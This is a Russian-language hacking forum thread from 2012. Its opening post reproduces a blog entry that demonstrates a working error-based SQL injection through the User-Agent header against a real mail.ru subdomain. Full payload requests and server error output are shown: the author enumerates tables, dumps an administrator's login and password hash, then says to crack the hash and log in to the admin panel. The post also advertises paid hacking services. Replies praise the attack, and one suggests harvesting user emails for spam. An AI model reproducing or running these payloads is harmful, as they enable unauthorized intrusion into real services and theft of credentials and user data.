Новости из Блогов SQL-injection на mail.ru

Discussion in 'Мировые новости. Обсуждения.' started by Ereee, 27 Mar 2012.

  1. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    SQL-injection на mail.ru


    Открываю блог скульей =) SQL-injection, конечно, не на самом mail.ru, а на поддомене kf.mail.ru.
    Отправляем запрос:
    Code:
    GET http://kf.mail.ru/index.php HTTP/1.0
    User-Agent: Mozilla "and(select 1 from(select count(*),concat((select table_name from information_schema.tables limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and "1
    Host: kf.mail.ru
    Accept: text/html
    Connection: Keep-Alive
    Получаем:
    Code:
    SQL Error: Duplicate entry 'COLLATIONS1' for key 1 at /var/www/megaferma/lib/classes/Pers/Game.php line 123
    Code 	1062
    Message 	Duplicate entry 'COLLATIONS1' for key 1
    Query 	INSERT INTO session SET sessionhash = "bcb98e2c5cbc4e314d053f2cfe9f2e56", host="xx.xx.xx.xx", lastactivity="2012-03-27 09:14:57", useragent="Mozilla "and(select 1 from(select count(*),concat((select table_name from information_schema.tables limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and "1"
    Context 	/var/www/megaferma/lib/classes/Pers/Game.php line 123
    Отправляем запрос:
    Code:
    User-Agent: Mozilla "and(select 1 from(select count(*),concat((select concat_ws(0x3a,login,passwd) from admin_profiles limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and "1
    Host: kf.mail.ru
    Accept: text/html
    Connection: Keep-Alive
    Получаем логин и пароль второго админа:
    Code:
    SQL Error: Duplicate entry 'antiwkololo:md5('antiwkololo')' for key 1 at /var/www/megaferma/lib/classes/Pers/Game.php line 115
    Code 	1062
    Message 	Duplicate entry 'antiwkololo:md5('antiwkololo')' for key 1
    Query 	INSERT INTO session SET sessionhash = "bcb98e2c5cbc4e314d053f2cfe9f2e56", host="xx.xx.xx.xx", lastactivity="2012-03-27 09:18:09", useragent="Mozilla "and(select 1 from(select count(*),concat((select concat_ws(0x3a,login,passwd) from admin_profiles limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and "1"
    Context 	/var/www/megaferma/lib/classes/Pers/Game.php line 115
    Получили логин и пароль в md5. Брутим и логинимся по адресу /admin/.
    Все банально, INSERT-скулья в User-Agent. Надеюсь, ребята из mail.ru меня не казнят :D
    Спасибо! Читайте мой блог =)

    Оригинал по адресу: http://dbitems.ru/blog/?x=entry:entry120327-071505
    А так же услуги по взлому
     
    #1 Ereee, 27 Mar 2012
    Last edited: 28 Mar 2012
  2. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    прямо таки "блог скулей"... посмотрим что получится))
     
  3. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    По мере возможностей буду писать в блог.
     
  4. Suicide

    Suicide Super Moderator
    Staff Member

    Joined:
    24 Apr 2009
    Messages:
    2,482
    Likes Received:
    7,062
    Reputations:
    693
    Главное начало положено, это тоже много чего значит. Хотя бы потому что Ereee сдержал своё слово.
     
    _________________________
  5. Radiator

    Radiator Active Member

    Joined:
    17 Mar 2009
    Messages:
    394
    Likes Received:
    143
    Reputations:
    24
    молодцом
     
  6. drim

    drim Member

    Joined:
    27 Aug 2009
    Messages:
    347
    Likes Received:
    33
    Reputations:
    4
    повезло, чо
    хотя, на ловца и зверь бежит =)
     
  7. Dyxxx

    Dyxxx Elder - Старейшина

    Joined:
    16 Feb 2009
    Messages:
    107
    Likes Received:
    155
    Reputations:
    24
    помню года 3 назад была скуля на auto.mail.ru, в бд было 255 таблиц по ~30000 пользователей в каждой но без паролей :(
    но тоже было весело :D
     
  8. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Спасибо) Если найдете какие уязвимости в моем блоге, то пишите в ПМ, как mr.Penguin , за что большое спасибо ему. Нашел еще одну крупную скулью) Потом опубликую)
     
  9. drim

    drim Member

    Joined:
    27 Aug 2009
    Messages:
    347
    Likes Received:
    33
    Reputations:
    4
    ну дык без паролей тоже можно монетизировать - email'ов надёргать под спам по автотематикам
     
  10. mr.Penguin

    mr.Penguin Member

    Joined:
    8 Mar 2012
    Messages:
    40
    Likes Received:
    37
    Reputations:
    74
    2 года назад, насчет паролей в открытом виде - я ничего не знаю. А вот хеши администраторов были.
     
  11. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Молодец :)